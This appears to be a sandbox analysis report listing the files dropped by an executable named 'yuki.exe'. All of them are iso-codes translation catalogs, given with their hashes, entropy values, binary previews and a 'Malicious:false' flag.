                                                                                                    Preview:........x.......................(.......).......3.......8.......B.......K.......S.......Z.......c.......l.......s.......................................................................................................................................................................#.......*.......2.......9.......>.......G.......N.......V......._.......e.......l.......r.......|...............................................................................................................................................................$......./.......:.......C.......M.......U.......[.......c.......m.......w.......}............................................................................................................................................................... .......(.......0.......6.......<.......B.......I.......N.......V.......\.......e.......{.......................................................................................................................................
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 62 messages, Project-Id-Version: iso_3166-1 'Afganist\303\241n'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):3810
                                                                                                    Entropy (8bit):4.94535105918381
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:9KBJc5opMz7ez6n+skNxL44EVogTiDyRIgNGiGVE/OiVv:9uc5r/ez6n+t44LgDzG2/Fv
                                                                                                    MD5:076CD88247DE3DD4DDCBF4041F14275B
                                                                                                    SHA1:0D9DEA07812CFB18250E95C0DAB923D84C535ECA
                                                                                                    SHA-256:97FE943D591166D88F2F06184E9CF9BD480CE766D72B461AA37F4F9E2AC7B81A
                                                                                                    SHA-512:78710044D450725A5500737042C97FE9D2BC348031583B937297E0717F1995EEF1CE4624DA58649585637DDE855A71B89C25D5076F36FEFF8DA2CB7E4855CF89
                                                                                                    Malicious:false
                                                                                                    Preview:........>...........S...........H.......I.......U.......].......l.......t.......{.......................................................................................................................................&.......,.......4.......;.......C... ...c...............................................................................................;.......W.......w...............................................................-.......A.......U.......l..........."...........................................................)...............................".......*.......1.......9.......C.......U.......`.......u.......}............................................................................................................................... .......?.......T.......].......i.......p........................................................... .........../.......@.......R.......c.......................................................................6...!...J.......l.......................
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 72 messages, Project-Id-Version: iso_15924 '\330\247\331\204\330\271\330\261\330\250\331\212\330\251'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):4112
                                                                                                    Entropy (8bit):5.094627890194036
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:82ZjcMBMlvld73Jl76eBjGxS3Q/iw5lqGRoA8Jpk8fnwh1juJip7UpT3VNLNv59i:8Ajc8M9ll2Sg/i+qGRoA8zk8fn01juY/
                                                                                                    MD5:23935D65DFAA2DE40DA0D3DD6BF70E1C
                                                                                                    SHA1:65488D398F87C646FD418127CD5429F00EE1CF8A
                                                                                                    SHA-256:CD45076D513BA26B9DB9245B890F93E522F980E3B66BC21BCCCBC6532DC585D1
                                                                                                    SHA-512:FF9B9B5729B8D792001DFB9024D5507FEA9D7D80FB8BFFF129B53250E7401FA80EDC31E4DA36FC73A9B8DDC81F15C4D2355FD812E99D9F02BFC8FE3AD62341D6
                                                                                                    Malicious:false
                                                                                                    Preview:........H.......\...a........... .......!.......(.......1.......9.......?.......G.......S.......\.......c.......k.......t.......z.......................................................................................................................................!.......).......2.......;.......F.......L.......P.......V.......\.......e.......n.......x...............................................................................................................................................*.......1.......:.......A.......G.......N.......V.......].......b.......j...%...s...............................................................................................1.......D.......S.......d.......u....................................................................... .......9.......H.......[.......r.......................................................................................*.......9.......I.......Y...%...r...................................#...................&.......5.......
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 419 messages, Project-Id-Version: iso_3166-1 '\330\243\331\201\330\272\330\247\331\206\330\263\330\252\330\247\331\206'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):28339
                                                                                                    Entropy (8bit):5.223530512436414
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:384:jhl7o5a/DkUJ9rcsYwL53/Ubjh5wsWP4XdAIzirGT7x69ms21nDRf8UP2OM/pKLx:jhZ9J9oTwL53ItmsWP4XdAIXxHFsOSS
                                                                                                    MD5:96DFC90CD5533954FE8D1551BE1BE37F
                                                                                                    SHA1:1990D72F47D2362A1343867670777B9DAB3553AE
                                                                                                    SHA-256:A8B531FC40CBA0BC11B2C237C7A484671764897AF3BA961733602747680D2CAF
                                                                                                    SHA-512:4870119D26EEB0E2178B470C3E308546BC2029E057A8EE5DE5281AD5DB40C9522557DFD639393CDE27A90EC6312A9880E7FD1F3C063FE0DF31F8F154809DC1D3
                                                                                                    Malicious:false
                                                                                                    Preview:................4...3...L........#.......#......%#......-#......5#......D#......L#......S#......\#......g#......{#.......#.......#.......#.......#.......#.......#.......#.......#.......#.......#.......#.......#.......$.......$.......$.......$......#$.. ...*$......K$......S$.. ...s$.......$.......$.......$.......$.......$.......$.......$.......%.......%......'%....../%......:%......C%......L%......S%......b%......{%.......%.......%.......%.......%.......%.......%.......%..,....%...... &......(&..%....&......T&......a&......l&......t&......y&.......&.......&.......&.......&..%....&..,....&.."....'..*...%'......P'......X'......a'......j'......}'.......'.......'.......'.......'.......'.......'.......'.......'.......'.......(..'....(..$...9(......^(......z(.......(.......(.......(.......(.......(.......(.......).......)......")......2)......N)......T)......f)......m)......u)......}).......).......).......).......).......).......).......).......).......).......).......).......).......)......
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 31 messages, Project-Id-Version: iso_3166-3 '\331\205\331\202\330\247\330\267\330\271\330\251 \330\247\331\204\331\205\330\255\331\212\330\267 \330\247\331\204\331\207\331\206\330\257\331\212 \330\247\331\204\330\250\330\261\331\212\330\267\330\247\331\206\331\212\331\221\330\251'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):3225
                                                                                                    Entropy (8bit):5.507140544577716
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:48:VAD+OVIxvJaRvGqIfdvqNuoU+XjJ/eBjfHdyBm7gKQUqTYBhau8:qD+rJuyBodJ/eBjVyijSYBh6
                                                                                                    MD5:DF9DB331943BF0C9394CA5F454937433
                                                                                                    SHA1:B97334002D652C1E0A9BAA62031E10763E11BAE0
                                                                                                    SHA-256:45A85A91ADF0057AECBD6B3DB8403EB058C8175F3AE8F1B56B212950B98C1E1B
                                                                                                    SHA-512:3DFE0233B7A94EC859B5A08E819E414DBB1D5DFFD35F70AC30D109C8183E79896A8AAA226D091C745825ED7ABEA5AE951035019C350F7CAB66F627555278DCC3
                                                                                                    Malicious:false
                                                                                                    Preview:....................).......................).......*...........".../...?.......o.......w...........................)...........................!.......1.......@.......U.......b...!...o................................... .......)............... ...6.......W...2...c...................=.......9.......I...@...".......Q...........................'.......A...*...]...K.......:....... ...........0.......J.......^.......v...........4...............!...........&.......-...3...K...G.......&.......8...........'...A...;.......}........................................................................................................................................................................British Antarctic Territory.Burma, Socialist Republic of the Union of.Byelorussian SSR Soviet Socialist Republic.Canton and Enderbury Islands.Czechoslovakia, Czechoslovak Socialist Republic.Dahomey.Dronning Maud Land.East Timor.France, Metropolitan.French Afars and Issas.French Southern and Antarctic Territori
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 134 messages, Project-Id-Version: iso_4217 '\331\210\330\255\330\257\330\251 \330\255\330\263\330\247\330\250 \330\250\331\206\331\203 \330\247\331\204\330\252\331\206\331\205\331\212\330\251 \330\247\331\204\330\245\331\201\330\261\331\212\331\202\331\212'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):8672
                                                                                                    Entropy (8bit):5.088811840979072
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:192:+Li8a5EBnbwaGqYYCygEDRlYDreXZnE13OIC0jFrl:wi8a5ERlNnTjlBJncXr
                                                                                                    MD5:A0490AC147E6F4D3106BFE7433889967
                                                                                                    SHA1:5AAC0844D770EFA54DDE519B20DD4048F2B8E0E5
                                                                                                    SHA-256:F90318CD0011709EE2A378D96C69061A67CD1F7CD8A939733C67DF453C2093B7
                                                                                                    SHA-512:A201F2FDCFDA2D9F961C04E9FE9D28CF1E0278763964A9DD27F7167C7429248F0846F3DF789D9412D03C9472DFD99EB250B7457EB2D552BE6E0DE07F2AA7EC93
                                                                                                    Malicious:false
                                                                                                    Preview:................L.......|.......H.......I.......].......e.......t............................................................................................... ...............<.......J.......Z.......p...0...}.......................................................................$.......*.......9.......>.......T.......c.......r.......w............................................................................................................... .......0.......@.......E.......J.......X......._.......d.......i.......x.......|...............................................................................................................#.......5.......H.......Y.......i.......x...............................................................................................................................%.......2.......E.......Q......._.......p.......w...............................................................................................................#.......6...A...<.......~.......
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 158 messages, Project-Id-Version: iso_639-3 '\330\247\331\204\330\243\330\250\330\256\330\247\330\262\331\212\330\251'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):8284
                                                                                                    Entropy (8bit):4.992585254654436
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:192:S1mLiRW8DnCZMmfZ03a+DHcBvWHvQ5mSULrHNRbnCSIt6Ly6T0XW4gsIKAzqSeGi:S8Lis8DCDxQsWHkE0X
                                                                                                    MD5:435DC6AEFD83A3B269203E19D5FD9452
                                                                                                    SHA1:EBBD320C43588C5A76DCBCE9951B2C8F4A114F2A
                                                                                                    SHA-256:C4F9177451BEC0337ADCF5AEB437FDE47E7EB333B5578C6EEBFDBFF5A9CECC15
                                                                                                    SHA-512:34E1EAA8BC4D08BC72B9D188BE94D26C5C3065CD16A304A45A81E7E0D967D2BC3E41456CA4CE43ADAB21BDC4AE63E025EBAA83F7ABED22985F05DC7D00AD35D0
                                                                                                    Malicious:false
                                                                                                    Preview:................................H.......I.......S.......\.......f.......~.......................................................................................................................................(...............6.......>.......E.......O.......W.......].......e.......m.......v.......................................................................................................................................................................................%.......*.......=.......E.......a.......k.......t.......|...............................................................................................................................................................................$.......*.......>.......F.......O.......V.......b.......k.......u.......|...............................................................................................................................................................".......*.......5.......<.......G.......O.......Z.......b.......
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 397 messages, Project-Id-Version: iso_3166-1 '\340\246\206\340\246\253\340\246\227\340\246\276\340\246\250\340\246\277\340\246\270\340\247\215\340\246\245\340\246\276\340\246\250'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):33554
                                                                                                    Entropy (8bit):4.991609355548515
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:768:m5ME/TwzvwlXmsOP4XJOAjyIGI99am2xuECGoiVMyoD98QxxIrOAw:ZEYIGIbam2xuJGoiVMyoD98QxxIrOAw
                                                                                                    MD5:40405175E15CB5A47982C91436A49B1F
                                                                                                    SHA1:B2CD26DEDF8D9FD64C0CCA17B794C122A8EC600C
                                                                                                    SHA-256:BC73D7040852D9942AFD860339F5E953E8B05BC330F61CD1D3717F5EC6005623
                                                                                                    SHA-512:EDDCC4A05558C0CD3A8501BA9A5011DD34267667C7879B503A6B2030A6423CAF20DAD7AA3025868FDC305D542B258326E7116DAA383CE5B19FA71CCC0B300792
                                                                                                    Malicious:false
                                                                                                    Preview:................................`!......a!......m!......u!......}!.......!.......!.......!.......!.......!.......!.......!.......!.......!.......!......."......."......."......""......*"......2"......="......F"......N"......V"......]"......c"......k".. ...r".......".......".......".......".......".......".......".......#......&#......8#......A#......N#......V#......_#......h#......o#......~#.......#.......#.......#.......#.......#.......#.......#.......#..,....$......<$......D$..%...J$......p$......}$.......$.......$.......$.......$.......$..%....$..,....$.."....%..*...0%......[%......c%......l%......u%.......%.......%.......%.......%.......%.......%.......%.......%.......%.......&..'....&..$...;&......`&......|&.......&.......&.......&.......&.......&.......&.......&.......'.......'......4'......:'......L'......S'......['......c'......i'......s'.......'.......'.......'.......'.......'.......'.......'.......'.......'.......'.......'.......'..!....(......)(......;(......Y(......b(..0...
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 31 messages, Project-Id-Version: iso_3166-3 '\340\246\254\340\247\215\340\247\260\340\246\277\340\246\237\340\246\277\340\246\266\340\247\215\340\246\254 \340\246\206\340\246\250\340\247\215\340\246\237\340\246\276\340\247\260\340\247\215\340\246\225\340\246\237\340\246\277\340\246\225 \340\246\205\340\246\236\340\247\215\340\246\232\340\246\262'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):4070
                                                                                                    Entropy (8bit):5.1752542138203745
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:qDtdLpAiWVeyBooLeP2tcUw0+A5+wQtTjHNgG:qDvLW5qnOtKAotTOG
                                                                                                    MD5:CF9E3E71779FA179748759FE784AA0EE
                                                                                                    SHA1:37C5DC18E0750C3471ACF495326E397AC55679DA
                                                                                                    SHA-256:E6F0FCB7476890BB4AD603CD2ADD4E960DD9BCE60AA73A74B3D452538D44FD07
                                                                                                    SHA-512:D79905E1AE7038767C8C21A9DE2379790D4A070A2F78DB70B6B7CAD24CC3864E620BFB1E94E317CFF9F21FF15C477FD3AE2D77A0E9D8615E0121019CC2D45D73
                                                                                                    Malicious:false
                                                                                                    Preview:....................).......................).......*...........".../...?.......o.......w...........................)...........................!.......1.......@.......U.......b...!...o................................... .......)............... ...6.......W...2...c...................M...]...u...........!...].......................,...............?.......?...7...d...w...Y.......N...6..."...............4.......%......."...2...\...U...,.......G...........'...+...=...y...i...........A...v...]...................0...1............................................................................................................................................................................British Antarctic Territory.Burma, Socialist Republic of the Union of.Byelorussian SSR Soviet Socialist Republic.Canton and Enderbury Islands.Czechoslovakia, Czechoslovak Socialist Republic.Dahomey.Dronning Maud Land.East Timor.France, Metropolitan.French Afars and Issas.French Southern and Antarctic Territori
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 1 message, Project-Id-Version: iso_15924
                                                                                                    Category:dropped
                                                                                                    Size (bytes):372
                                                                                                    Entropy (8bit):5.147489183732665
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:6:ilijn1YYxCfGCt0vOuvP0NXzffGGXkk/RcximC3XAF5ITGuWXmBQ8KMW0YEi9:i4n1xxCfVt02Ukx/iximCg5ITvWXmBQV
                                                                                                    MD5:A3D30FACDDCE70BC5B3C0AB8F55A07EB
                                                                                                    SHA1:9C37DDC26CD4B90074EBA86AD7C79FE093835C3E
                                                                                                    SHA-256:A221945FF653B6E9C4E112DE80EDFD93F92560949822DE8542F79DDE3E141845
                                                                                                    SHA-512:52670041BFEECCEA14950D272D366A591BFA69BA5F370D0E71D8893739D68B54A786E19A2F96B18166965DA7F407CC8F5F37D62B776CF2E502D391B39E7900B2
                                                                                                    Malicious:false
                                                                                                    Preview:................$.......,.......8...:...9................Project-Id-Version: iso_15924.Report-Msgid-Bugs-To: https://salsa.debian.org/iso-codes-team/iso-codes/issues.PO-Revision-Date: YEAR-MO-DA HO:MI+ZONE.Last-Translator: Automatically generated.Language-Team: none.Language: ast.MIME-Version: 1.0.Content-Type: text/plain; charset=UTF-8.Content-Transfer-Encoding: 8bit..
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 405 messages, Project-Id-Version: iso_3166-1 'Afghanist\303\241n'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):22752
                                                                                                    Entropy (8bit):5.052681289691024
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:384:/FtCOYS49fGRlmuIbwlvpla0kk5Kr8jq5wsOP4XJOAE1i3qxa4vkKEd4Agkz:dUz902wlvplWk5r+msOP4XJOAE7LvzEp
                                                                                                    MD5:635592668B7F0C99FBAB563488ED00E1
                                                                                                    SHA1:1E3680A3C19EB0E545DAD0D987B6D7566A687960
                                                                                                    SHA-256:47F31E299D330A5A769BDCBDC3D5BC52585A0768368404972B0E1187F57DD28F
                                                                                                    SHA-512:6E61B5094EB34FA983D5A25787E21BC8490711B4E91278A2D8A894C25C486BD57FD34A255C75D38EE61905B59E9607418BA89317E4270950B3C96D93C12F88CC
                                                                                                    Malicious:false
                                                                                                    Preview:........................l........!.......!.......!.......!.......!......."......."......."......$"....../"......C"......Z"......d"......w".......".......".......".......".......".......".......".......".......".......".......".......".......".......".. ....".......#.......#.. ...;#......\#......s#......|#.......#.......#.......#.......#.......#.......#.......#.......#.......$.......$.......$.......$......8$......=$......C$......I$......Z$......r$......{$.......$..,....$.......$.......$..%....$.......%.......%......)%......1%......6%......?%......F%......U%..%...d%..,....%.."....%..*....%.......&.......&.......&.......&......2&......N&......V&......\&......h&......z&.......&.......&.......&.......&..'....&..$....&.......'......&'......B'......a'.......'.......'.......'.......'.......'.......'.......'.......'.......'.......'.......'.......(.......(.......(.......(......7(......>(......H(......P(......[(......`(......j(......s(......z(.......(.......(.......(..!....(.......(.......(......
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 1 message, Project-Id-Version: iso_3166-2
                                                                                                    Category:dropped
                                                                                                    Size (bytes):373
                                                                                                    Entropy (8bit):5.153049948077457
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:6:ilijWYYxAgCt0vOuvP0NXzffGGXkk/RcximC3XAF5ITGuWXmBQ8KMW0YEi9:i4Wxx8t02Ukx/iximCg5ITvWXmBQWi9
                                                                                                    MD5:70DF24440AE5FE7E23BFA062FAFE18AF
                                                                                                    SHA1:C9B6551112ECCC47B7469C3EB8C49CAA2D0D994B
                                                                                                    SHA-256:FCC86305AC479397A0EBE9EDB2FA849E6631A790C3E51B786A928E00C4A311E4
                                                                                                    SHA-512:7492843802C355AB2A8C27A2EAC9B5D2909D843421CC25A8D8CB9A0C3529534D3376BCE896A3B80C80218DB70F9CB72FD1658115858CFA708E6650ABE2655474
                                                                                                    Malicious:false
                                                                                                    Preview:................$.......,.......8...;...9................Project-Id-Version: iso_3166-2.Report-Msgid-Bugs-To: https://salsa.debian.org/iso-codes-team/iso-codes/issues.PO-Revision-Date: YEAR-MO-DA HO:MI+ZONE.Last-Translator: Automatically generated.Language-Team: none.Language: ast.MIME-Version: 1.0.Content-Type: text/plain; charset=UTF-8.Content-Transfer-Encoding: 8bit..
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 31 messages, Project-Id-Version: iso_3166-3 'Territoriu Brit\303\241nicu Ant\303\241rticu'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):2670
                                                                                                    Entropy (8bit):5.209287354757367
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:48:VADAU+wevGqIfdvqNuoU8jWjnVQTXzIQgnV:qDP+pyBo8jnCXngnV
                                                                                                    MD5:30E67C740B066DA46ED0008B92A4ED60
                                                                                                    SHA1:F0743364078C9BEE27729BCDC63108FD167AF117
                                                                                                    SHA-256:AE641A55DAFE5D2DA75E73BA69BCEEC94D841441BA604620405CC8D8E46AB7FA
                                                                                                    SHA-512:7C4B8FBF9FC70B7ECBEEC3C62778003F3A2A02C8C4C99BCD6C9C8E639312E0B8CB914F629AB884CFACE817D4DC4372220B3FE3011A2E3D6ED258F9B4A9AC778F
                                                                                                    Malicious:false
                                                                                                    Preview:....................).......................).......*...........".../...?.......o.......w...........................)...........................!.......1.......@.......U.......b...!...o................................... .......)............... ...6.......W...2...c................... .............../..............."...........6.......>.......S.......^.......u...*....... ...........................................#.......0.......:.......O.......`.......t.......{...........6...............$..........."...*...-.......X........................................................................................................................................................................British Antarctic Territory.Burma, Socialist Republic of the Union of.Byelorussian SSR Soviet Socialist Republic.Canton and Enderbury Islands.Czechoslovakia, Czechoslovak Socialist Republic.Dahomey.Dronning Maud Land.East Timor.France, Metropolitan.French Afars and Issas.French Southern and Antarctic Territori
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 1 message, Project-Id-Version: iso_4217
                                                                                                    Category:dropped
                                                                                                    Size (bytes):371
                                                                                                    Entropy (8bit):5.147848694194945
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:6:ilijcYYxkXCt0vOuvP0NXzffGGXkk/RcximC3XAF5ITGuWXmBQ8KMW0YEi9:i4cxxRt02Ukx/iximCg5ITvWXmBQWi9
                                                                                                    MD5:CC4BD031076F43D8320651A458C7DE24
                                                                                                    SHA1:68AC504DE810A1A4B2AF0E50D0B5E6080102F405
                                                                                                    SHA-256:28D3E35DD9807D2868894DF026FCA8C76DA615DF8DE940286D5FC39A2CAC8598
                                                                                                    SHA-512:6170A3AC144670FDBF7178FAB1CBA7C253AB1D15C1CC3372056407618E94DD442A3236A7DA7178A0C3A13825F20F58DF9A7080A9FA90C681FBF7CC8121A23B8B
                                                                                                    Malicious:false
                                                                                                    Preview:................$.......,.......8...9...9................Project-Id-Version: iso_4217.Report-Msgid-Bugs-To: https://salsa.debian.org/iso-codes-team/iso-codes/issues.PO-Revision-Date: YEAR-MO-DA HO:MI+ZONE.Last-Translator: Automatically generated.Language-Team: none.Language: ast.MIME-Version: 1.0.Content-Type: text/plain; charset=UTF-8.Content-Transfer-Encoding: 8bit..
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 7442 messages, Project-Id-Version: iso_639-3 ''Are'are'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):311331
                                                                                                    Entropy (8bit):5.2239869106763095
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:6144:Iv0FtOe4nzIm1u4osRPy51/T6Wzfy9Bz/Hy3hY2XxlE8cZP3z2u:a0FoMmM5sorgxvgK2TzGfKu
                                                                                                    MD5:96BC2DB103734A1923877380FAFCD807
                                                                                                    SHA1:AF387E673559E1B5050E532BF4C0D63A89B98EFC
                                                                                                    SHA-256:60C010FB619678A2EA319CFC181D2536D6B64F3EAB69B930408E2FD6A83DDFED
                                                                                                    SHA-512:2B38978E25AAFBE1C7D2B85B20088913943C2BE30341C55743392D467E358F9E58CB0206F3C408FE43BC567EFF0AF98737BF81EA5B3E580F3376967D42DAF096
                                                                                                    Malicious:false
                                                                                                    Preview:.....................&..<.......Hl......Il......Rl......\l......al......ll......ql......xl......~l.......l.......l.......l.......l.......l.......l.......l.......l.......l.......l.......l.......l.......l.......l.......l.......m.......m.......m.......m.......m.......m......"m......'m....../m......6m......;m......Cm......Hm......Qm......]m......lm......um......{m.......m.......m.......m.......m.......m.......m.......m.......m.......m.......m.......m.......m.......m.......m.......n.......n.......n.......n......%n......,n......1n......8n......@n......Dn......Jn......On......dn......kn......tn......~n.......n.......n.......n.......n.......n.......n.......n.......n.......n.......n.......n.......n.......n.......o.......o......(o......5o......Eo......Uo......co......xo.......o.......o.......o.......o.......o.......o.......o.......o.......o.......o.......o.......o.......o.......o.......o.......o.......p.......p.......p.......p.......p......,p......9p......?p......Gp......Mp......[p......jp......
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 61 messages, Project-Id-Version: iso_639-5 'Lling\303\274es Afro-Asiatiques'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):4029
                                                                                                    Entropy (8bit):4.869029674602663
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:48:5q3GMhqnlhGTMkKiTbE1ayDu3KK0UL30ULf+qadXQvhr/CUJhvjv3Zm1TEhHUcAT:0WMjyiPrR0E0C+fIC0hvjvwEhHUcNNG
                                                                                                    MD5:58561BDA970A4B02791F5A7E6CB05C09
                                                                                                    SHA1:4DF680D7A7894A35B83A8DCBA860C767D90AD63B
                                                                                                    SHA-256:AA7F967BD81D85EFCF11830B3E1ADCDEAE2F00E7B906093626D7E8B5B38631EC
                                                                                                    SHA-512:E9ADCB94D3D8EB30E6646D841F2EF805863506870F86AF9B2911D060850C2610B2EFB749869A10BBC021344E15A46C24244DFD2CD1DBEED3BB412A00F72267CA
                                                                                                    Malicious:false
                                                                                                    Preview:........=...........S...........8.......9.......P.......e.......v.......................................................................!.......2.......C.......W...!...h...................%...........................................&.......4.......D.......\.......n.......................................................................................:.......Q.......q...............................................................................).......:.......K.......].......o.......}...........................:...........................*.......;.......M.......d.......{.......................................................................*...'...?.......g.......x...(...........................................................+.......C.......V.......j.......z.......................................................................#...)...:.......d.......u....................................................................... .......1.......G.......Y.......k.......y.......................
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 1 message, Project-Id-Version: iso_3166-1
                                                                                                    Category:dropped
                                                                                                    Size (bytes):521
                                                                                                    Entropy (8bit):5.312363360655273
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:12:i4X6xxLtt02UkEFA/xtLLif/4F+/MWXmBQWiOWzBl:RXAjt0UEq8/nXmGzBl
                                                                                                    MD5:F45ABE0D3176D7FB98DEA75F5A59F4B6
                                                                                                    SHA1:CCAD71BFA7DCAF112F21D71B870D94890347B5F2
                                                                                                    SHA-256:70182056983E72F838F7AFEBD4FDA23FC73AA57795E6D5C0587788E0C5068D2F
                                                                                                    SHA-512:0F9534BB20647188F30529BB78AE671530FEF5D39377DD912B0B0F1FD191FDB81977EEE4AB820326B203156AE0EB702B2B54620FCDBE4A1C0243279395B66D09
                                                                                                    Malicious:false
                                                                                                    Preview:................$.......,.......8.......9................Project-Id-Version: iso_3166-1.Report-Msgid-Bugs-To: https://salsa.debian.org/iso-codes-team/iso-codes/issues.PO-Revision-Date: 2017-12-25 23:20+0000.Last-Translator: Chris Leonard <cjlhomeaddress@gmail.com>.Language-Team: Aymar. <https://hosted.weblate.org/projects/iso-codes/iso-3166-1/ay/>.Language: ay.MIME-Version: 1.0.Content-Type: text/plain; charset=UTF-8.Content-Transfer-Encoding: 8bit.Plural-Forms: nplurals=1; plural=0;.X-Generator: Weblate 2.19-dev..
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 222 messages, Project-Id-Version: iso_3166-1 '\306\217fqan\304\261stan'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):10337
                                                                                                    Entropy (8bit):4.909478571705019
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:192:5qSL2dsP4XQ/ufvchQRKTbFsA6/WJrx96FgH0DssdPShSbeJDOoP6hK:M7dse8ufv0QRKts7/WJV86Ugsd/JoPP
                                                                                                    MD5:59A7B53840327621BFA026A622AA512A
                                                                                                    SHA1:D921796606D64B4556D394289F85C6E92E1BB834
                                                                                                    SHA-256:615596D65A24C632AA389BAD551A26EAC2307762A0836FFEF437B1D0652FCB6D
                                                                                                    SHA-512:CDD502540169BA9C7366954E55AEE290A9CCC778C14BC861B06B887306D15E601F6B77A04CE06DE69876A15436CA19441CC839D74540B33FBD45654A1F71C14A
                                                                                                    Malicious:false
                                                                                                    Preview:....................3...........................................................................................+.......5.......=.......C.......M.......U.......`.......h.......p.......{...............................................................................................................,.......>.......G.......T.......\.......e.......n.......u...............................................................................................................................).......8.......@.......I.......R.......e.......m.......s...............................................................................................................................$.......*.......4.......N.......U......._.......g.......r.......w.......................................................................................................................!.......(...............6.......<.......C.......N.......T...&...].......................................................................................
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 68 messages, Project-Id-Version: iso_3166-2 'Alabama'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):3341
                                                                                                    Entropy (8bit):4.827079701599104
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:48:KPhjzYDmlyetmHmzurwBP4g0hNbGP+fDdnCRlc1hSzKeaaj5UZ/Uh0ZyeZYOiWfZ:QS+Z23Vbpx1hHla6/ZZyeZXibCdIGE0
                                                                                                    MD5:F1DE1C515AEC2A4024A8C85529A66BAA
                                                                                                    SHA1:8D5BEBC99ABAABBAC28974BF98B5D09784479DF3
                                                                                                    SHA-256:28EAB7983C3D0D8512FAB8E426E50F9F1E06CBE5003A2F15352B848B85789510
                                                                                                    SHA-512:19E2EB7B145136B97BCBB1278171A4D6A0C21FC4D30CDA683D1BE0266930B057225716C52248ABF50C832B520397CD1193474DAB819D84A94774BBBCC988936B
                                                                                                    Malicious:false
                                                                                                    Preview:........D.......<...a...\.......................................................................................:.......C.......X.......a.......i.......t.......y...............................................................................................................................................................(.......6.......A.......L.......U.......[.......j.......w...............................................................................................................$...........$...4.......Y.......^.......f.......o.......z.......................................6.......>.......F.......N.......].......f.......l.......r.......................................................................................................................................................$.......-.......:.......C.......M.......W......._.......h.......o.......}...............................................................................................................%.......>.......I.......
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 2 messages, Project-Id-Version: iso_3166-3 'Holland Antill\311\231ri'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):497
                                                                                                    Entropy (8bit):5.1986872203643015
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:6:ilVWmwuHNNGYxA9Ct0vOuvP0NXzffUaX//RMxIVvLKL2AF0l/Wnoq3XmBQ8KMW0T:iBwK1xjt02Ukp/SiULL0ZWp3XmBQWia7
                                                                                                    MD5:CDD099F08E218745E59175114B166AD3
                                                                                                    SHA1:438B1A5303CE42FE7B858DFECC76BFBB072A8D5C
                                                                                                    SHA-256:0923CDA2C66F2148283A69AA8724F4A12795DA67E5A2E6E3BF5AD9581D9650C0
                                                                                                    SHA-512:BCC419617958DA98B1E3077959E6D659294A390096357A48417F0BB368E533DAEB889B2B0169D701FA640D19087E921B4BDE757411B23AEB132C1768ABFFB4C6
                                                                                                    Malicious:false
